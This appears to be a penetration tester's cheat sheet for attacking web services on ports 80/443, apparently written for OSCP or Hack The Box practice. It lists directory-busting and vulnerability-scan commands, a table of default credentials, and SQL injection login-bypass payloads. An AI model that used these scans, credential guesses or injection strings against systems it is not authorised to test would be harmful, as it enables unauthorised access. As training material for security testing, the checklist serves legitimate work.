80/443 - HTTP(s)

First Thing I would do:

1. Directory busting: dirb http:///<IP>/

2. Directory busting: gobuster dir -x php,txt,xml,asp,aspx --url http://<IP>/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -b 404 -f

3. Directory busting: ffuf -c -u http:///FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

4. Vulnerability Scan: nmap <IP> -p80 -script vuln -Pn

5. Vulnerability Scan: nikto -host http://<IP>/

6. WordPress Scan: wpscan --url http://<IP>/

While Scans are running, Try:

1. Try Weak Credentials, Default Login, Intercept Request in Burp, and Try Dictionary attack to crack the credentials, Try SQLi

2. Check the Source code if anything Juicy

3. If you see any CMS (Joomla, WordPress, Tomcat, etc), visit my go-to website here

4. Sometimes you also find creds in CMS's Github. Also, look for config files, and Readme files which can reveal sensitive info.

5. If you find SQLi then go here

6. If you find LFI/RFI then go here

7. If you find File Uploads then go here

8. Note all the usernames + keywords, sometimes cewl tool helps for cracking the password

9. Find exploits using keywords in the following manner: keyword poc, keyword GitHub, keyword htb, keyword hack the box

Default Creds Login Page

User	Pass
admin	admin
admin	password
admin	1234
admin	123456
root	toor
test	test
guest	guest
anonymous	anonymous

SQL Injection

User	Pass
tom	tom
tom	' or '1'='1
tom	' or 1='1
tom	1' or 1=1 -- -
' or '1'='1	' or '1'='1
' or ' 1=1	' or ' 1=1
1' or 1=1 -- -	blah
whatever' or '1'='1	whatever' or '1'='1

SQL-Injections · Total OSCP Guide

GitHub - payloadbox/sql-injection-payload-list: 🎯 SQL Injection Payload ListGitHub

80,443 - Pentesting Web MethodologyHackTricks